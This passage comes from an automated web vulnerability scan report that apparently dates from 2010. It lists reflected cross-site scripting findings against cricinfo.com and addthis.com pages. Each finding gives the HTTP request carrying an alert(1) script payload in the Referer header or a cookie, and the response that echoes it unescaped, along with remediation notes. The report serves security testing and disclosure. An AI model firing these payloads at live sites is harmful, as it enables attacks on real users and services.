           if(event.srcElement.name == "txtZip"){            
               if (event.keyCode==13) {                            
                   IsLocalZipValid('frmZip','/error404.aspx?404;http://www.insightbb.com:80/Auth/Authpartners.aspx51194';f833bbb8ea9');
               }                            
           }
       }else{                        
           if (e.target.name == "txtZip"){                        
               if (e.keyCode==13) {                        
                    IsLocalZipValid('frmZip','/error404.aspx?404;http://www.insightbb.com:80/Auth/A
...[SNIP]...

5.159. http://submit.cricinfo.com/ci/content/submit/comment/redirect.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://submit.cricinfo.com
Path:   /ci/content/submit/comment/redirect.html

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 296e5"><script>alert(1)</script>e5a735cc086 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /ci/content/submit/comment/redirect.html?object_id=485657;content_type_id=1;story_abstract=Sri%20Lanka%20captain%20Kumar%20Sangakkara%20was%20unsurprisingly%20full%20of%20praise%20for%20his%20team%20after%20they%20wrapped%20up%20their%20first%20ever%20series%20victory%20on%20Australian%20soil%20with%20a%2029-run%20win%20in%20the%20second%20one-dayer%20at%20the%20Sydney%20Cricket%20Ground;story_title=Sangakkara%20credits%20Sri%20Lanka's%20self-belief%20in%20series%20win; HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.google.com/search?hl=en&q=296e5"><script>alert(1)</script>e5a735cc086
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: submit.cricinfo.com

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 03:12:48 GMT
Server: Apache
Set-Cookie: Q_cricinfo_country=us; path=/; domain=.cricinfo.com
Set-Cookie: Q_cricinfo_cluster=usa; path=/; domain=.cricinfo.com
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Sun, 06 Jan 1985 03:30:00 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 1330


<style type="text/css">

#stryFtrLft, #stryFtrRt {
   float:left;
   width:312px;
}
.rltdBlue, .rltdBlue a:link, .rltdBlue a:visited, .rltdBlue a:active {
   color:#0b3766;
   font-size:12px;
   text-decoratio
...[SNIP]...
<a target="_top" href="/ci/content/submit/member_mgmt/user_registration.html?object_id=485657;sc=Comments;ref=http://www.google.com/search?hl=en&q=296e5"><script>alert(1)</script>e5a735cc086" class="rltdBlue">
...[SNIP]...

5.160. http://submit.cricinfo.com/ci/content/submit/comment/usr_login.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://submit.cricinfo.com
Path:   /ci/content/submit/comment/usr_login.html

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a22ce"><script>alert(1)</script>99653f53917 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /ci/content/submit/comment/usr_login.html HTTP/1.1
Host: submit.cricinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=us;
Referer: http://www.google.com/search?hl=en&q=a22ce"><script>alert(1)</script>99653f53917

Response

HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 03:12:42 GMT
Server: Apache
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Sun, 06 Jan 1985 03:30:00 GMT
Content-Length: 1324
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8


<style type="text/css">

#stryFtrLft, #stryFtrRt {
   float:left;
   width:312px;
}
.rltdBlue, .rltdBlue a:link, .rltdBlue a:visited, .rltdBlue a:active {
   color:#0b3766;
   font-size:12px;
   text-decoratio
...[SNIP]...
<a target="_top" href="/ci/content/submit/member_mgmt/user_registration.html?object_id=;sc=Comments;ref=http://www.google.com/search?hl=en&q=a22ce"><script>alert(1)</script>99653f53917" class="rltdBlue">
...[SNIP]...

5.161. http://submit.cricinfo.com/ci/content/submit/member_mgmt/user_registration.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://submit.cricinfo.com
Path:   /ci/content/submit/member_mgmt/user_registration.html

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f392d"><script>alert(1)</script>00c65ad03a2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /ci/content/submit/member_mgmt/user_registration.html HTTP/1.1
Host: submit.cricinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=us;
Referer: http://www.google.com/search?hl=en&q=f392d"><script>alert(1)</script>00c65ad03a2

Response

HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 03:14:52 GMT
Server: Apache
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Sun, 06 Jan 1985 03:30:00 GMT
Content-Length: 148354
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- hostname: submit, country: us, cluster: usa, created: 2010-11-07 03:14:52
...[SNIP]...
<input type="hidden" name="referer" value="http://www.google.com/search?hl=en&q=f392d"><script>alert(1)</script>00c65ad03a2">
...[SNIP]...

5.162. http://submit.cricinfo.com/member_mgmt/content/submit/member_mgmt/user_registration.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://submit.cricinfo.com
Path:   /member_mgmt/content/submit/member_mgmt/user_registration.html

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c86d5"><script>alert(1)</script>3da25da6da3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /member_mgmt/content/submit/member_mgmt/user_registration.html HTTP/1.1
Host: submit.cricinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=us;
Referer: http://www.google.com/search?hl=en&q=c86d5"><script>alert(1)</script>3da25da6da3

Response

HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 03:19:20 GMT
Server: Apache
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Sun, 06 Jan 1985 03:30:00 GMT
Content-Length: 148472
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- hostname: submit, country: us, cluster: usa, created: 2010-11-07 03:19:20
...[SNIP]...
<input type="hidden" name="referer" value="http://www.google.com/search?hl=en&q=c86d5"><script>alert(1)</script>3da25da6da3">
...[SNIP]...

5.163. http://www.addthis.com/bookmark.php [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload fb9a1<script>alert(1)</script>3a2ab225915 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=fb9a1<script>alert(1)</script>3a2ab225915

Response

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 17:30:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 87026

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<h4>fb9a1<script>alert(1)</script>3a2ab225915 - Google search</h4>
...[SNIP]...

5.164. http://www.addthis.com/bookmark.php [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b78f"><script>alert(1)</script>25b9e7b34ca was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=7b78f"><script>alert(1)</script>25b9e7b34ca

Response

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 17:30:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 87040

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<input type="hidden" id="url" name="url" value="http://www.google.com/search?hl=en&q=7b78f"><script>alert(1)</script>25b9e7b34ca" />
...[SNIP]...

5.165. http://submit.cricinfo.com/ci/content/submit/member_mgmt/user_registration.html [Q_cricinfo_cluster cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://submit.cricinfo.com
Path:   /ci/content/submit/member_mgmt/user_registration.html

Issue detail

The value of the Q_cricinfo_cluster cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4754'-alert(1)-'d4807eabfe9 was submitted in the Q_cricinfo_cluster cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ci/content/submit/member_mgmt/user_registration.html HTTP/1.1
Host: submit.cricinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Q_cricinfo_cluster=usaf4754'-alert(1)-'d4807eabfe9; Q_cricinfo_country=us;

Response

HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 03:12:39 GMT
Server: Apache
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Sun, 06 Jan 1985 03:30:00 GMT
Content-Length: 148414
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- hostname: submit, country: us, cluster: usaf4754'-alert(1)-'d4807eabfe9,
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/espncricinfo_global/global;kvcluster=usaf4754'-alert(1)-'d4807eabfe9;kvpt=index;kvsite=global;kvbrand=member_mgmt;tile=1;sz=728x90;ord=' + ord + '?" type="text/javascript">
...[SNIP]...

5.166. http://submit.cricinfo.com/ci/content/submit/member_mgmt/user_registration.html [Q_cricinfo_cluster cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://submit.cricinfo.com
Path:   /ci/content/submit/member_mgmt/user_registration.html

Issue detail

The value of the Q_cricinfo_cluster cookie is copied into an HTML comment. The payload 2f0e1--><script>alert(1)</script>28479a8797f was submitted in the Q_cricinfo_cluster cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /ci/content/submit/member_mgmt/user_registration.html HTTP/1.1
Host: submit.cricinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Q_cricinfo_cluster=usa2f0e1--><script>alert(1)</script>28479a8797f; Q_cricinfo_country=us;

Response

HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 03:12:43 GMT
Server: Apache
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Sun, 06 Jan 1985 03:30:00 GMT
Content-Length: 148494
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- hostname: submit, country: us, cluster: usa2f0e1--><script>alert(1)</script>28479a8797f, created: 2010-11-07 03:12:43 -->
...[SNIP]...

5.167. http://submit.cricinfo.com/ci/content/submit/member_mgmt/user_registration.html [Q_cricinfo_cluster cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://submit.cricinfo.com
Path:   /ci/content/submit/member_mgmt/user_registration.html

Issue detail

The value of the Q_cricinfo_cluster cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbb23"><script>alert(1)</script>73ebe8053a2 was submitted in the Q_cricinfo_cluster cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ci/content/submit/member_mgmt/user_registration.html HTTP/1.1
Host: submit.cricinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Q_cricinfo_cluster=usabbb23"><script>alert(1)</script>73ebe8053a2; Q_cricinfo_country=us;

Response

HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 03:12:35 GMT
Server: Apache
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Sun, 06 Jan 1985 03:30:00 GMT
Content-Length: 148489
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- hostname: submit, country: us, cluster: usabbb23"><script>alert(1)</scrip
...[SNIP]...
<a href="http://ad.vulnerable.ad.partner/jump/espncricinfo_global/global;kvcluster=usabbb23"><script>alert(1)</script>73ebe8053a2;kvpt=index;kvsite=global;kvbrand=member_mgmt;tile=1;sz=728x90;ord=123456789?" target="_blank">
...[SNIP]...

5.168. http://submit.cricinfo.com/ci/content/submit/member_mgmt/user_registration.html [Q_cricinfo_country cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://submit.cricinfo.com
Path:   /ci/content/submit/member_mgmt/user_registration.html

Issue detail

The value of the Q_cricinfo_country cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96c17'-alert(1)-'4cef5e4a3c8 was submitted in the Q_cricinfo_country cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ci/content/submit/member_mgmt/user_registration.html HTTP/1.1
Host: submit.cricinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=us96c17'-alert(1)-'4cef5e4a3c8;

Response

HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 03:13:25 GMT
Server: Apache
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Sun, 06 Jan 1985 03:30:00 GMT
Content-Length: 148330
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- hostname: submit, country: us96c17'-alert(1)-'4cef5e4a3c8, cluster: usa,
...[SNIP]...
<script language="javascript" type="text/javascript">
   ord=Math.random()*10000000000000000;

   cqanswer = 'us96c17'-alert(1)-'4cef5e4a3c8';
</script>
...[SNIP]...

5.169. http://submit.cricinfo.com/ci/content/submit/member_mgmt/user_registration.html [Q_cricinfo_country cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://submit.cricinfo.com
Path:   /ci/content/submit/member_mgmt/user_registration.html

Issue detail

The value of the Q_cricinfo_country cookie is copied into an HTML comment. The payload e70d8--><script>alert(1)</script>9c7a9f58fdc was submitted in the Q_cricinfo_country cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /ci/content/submit/member_mgmt/user_registration.html HTTP/1.1
Host: submit.cricinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=use70d8--><script>alert(1)</script>9c7a9f58fdc;

Response

HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 03:13:28 GMT
Server: Apache
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Sun, 06 Jan 1985 03:30:00 GMT
Content-Length: 148362
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- hostname: submit, country: use70d8--><script>alert(1)</script>9c7a9f58fdc, cluster: usa, created: 2010-11-07 03:13:28 -->
...[SNIP]...

5.170. http://submit.cricinfo.com/ci/content/submit/poll/cast_vote.html [Q_cricinfo_cluster cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://submit.cricinfo.com
Path:   /ci/content/submit/poll/cast_vote.html

Issue detail

The value of the Q_cricinfo_cluster cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8d00"><script>alert(1)</script>f3bf3b3642a was submitted in the Q_cricinfo_cluster cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ci/content/submit/poll/cast_vote.html HTTP/1.1
Host: submit.cricinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Q_cricinfo_cluster=usaa8d00"><script>alert(1)</script>f3bf3b3642a; Q_cricinfo_country=us;

Response

HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 03:12:29 GMT
Server: Apache
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Sun, 06 Jan 1985 03:30:00 GMT
Content-Length: 83786
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- hostname: submit, country: us, cluster: usaa8d00"><script>alert(1)</scrip
...[SNIP]...
<a href="http://ad.vulnerable.ad.partner/jump/espncricinfo_global/global;kvcluster=usaa8d00"><script>alert(1)</script>f3bf3b3642a;kvpt=index;kvsite=global;kvbrand=ci;tile=1;sz=728x90;ord=123456789?" target="_blank">
...[SNIP]...

5.171. http://submit.cricinfo.com/ci/content/submit/poll/cast_vote.html [Q_cricinfo_cluster cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://submit.cricinfo.com
Path:   /ci/content/submit/poll/cast_vote.html

Issue detail

The value of the Q_cricinfo_cluster cookie is copied into an HTML comment. The payload 41993--><script>alert(1)</script>107db245a11 was submitted in the Q_cricinfo_cluster cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /ci/content/submit/poll/cast_vote.html HTTP/1.1
Host: submit.cricinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Q_cricinfo_cluster=usa41993--><script>alert(1)</script>107db245a11; Q_cricinfo_country=us;

Response

HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 03:12:36 GMT
Server: Apache
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Sun, 06 Jan 1985 03:30:00 GMT
Content-Length: 83803
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- hostname: submit, country: us, cluster: usa41993--><script>alert(1)</script>107db245a11, created: 2010-11-07 03:12:36 -->
...[SNIP]...

5.172. http://submit.cricinfo.com/ci/content/submit/poll/cast_vote.html [Q_cricinfo_cluster cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://submit.cricinfo.com
Path:   /ci/content/submit/poll/cast_vote.html

Issue detail

The value of the Q_cricinfo_cluster cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9904d'-alert(1)-'218689b8227 was submitted in the Q_cricinfo_cluster cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ci/content/submit/poll/cast_vote.html HTTP/1.1
Host: submit.cricinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Q_cricinfo_cluster=usa9904d'-alert(1)-'218689b8227; Q_cricinfo_country=us;

Response

HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 03:12:33 GMT
Server: Apache
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Sun, 06 Jan 1985 03:30:00 GMT
Content-Length: 83531
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- hostname: submit, country: us, cluster: usa9904d'-alert(1)-'218689b8227,
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/espncricinfo_global/global;kvcluster=usa9904d'-alert(1)-'218689b8227;kvpt=index;kvsite=global;kvbrand=ci;tile=1;sz=728x90;ord=' + ord + '?" type="text/javascript">
...[SNIP]...

5.173. http://submit.cricinfo.com/ci/content/submit/poll/cast_vote.html [Q_cricinfo_country cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://submit.cricinfo.com
Path:   /ci/content/submit/poll/cast_vote.html

Issue detail

The value of the Q_cricinfo_country cookie is copied into an HTML comment. The payload b19ab--><script>alert(1)</script>f7e4260af65 was submitted in the Q_cricinfo_country cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /ci/content/submit/poll/cast_vote.html HTTP/1.1
Host: submit.cricinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=usb19ab--><script>alert(1)</script>f7e4260af65;

Response

HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 03:13:12 GMT
Server: Apache
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Sun, 06 Jan 1985 03:30:00 GMT
Content-Length: 82907
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

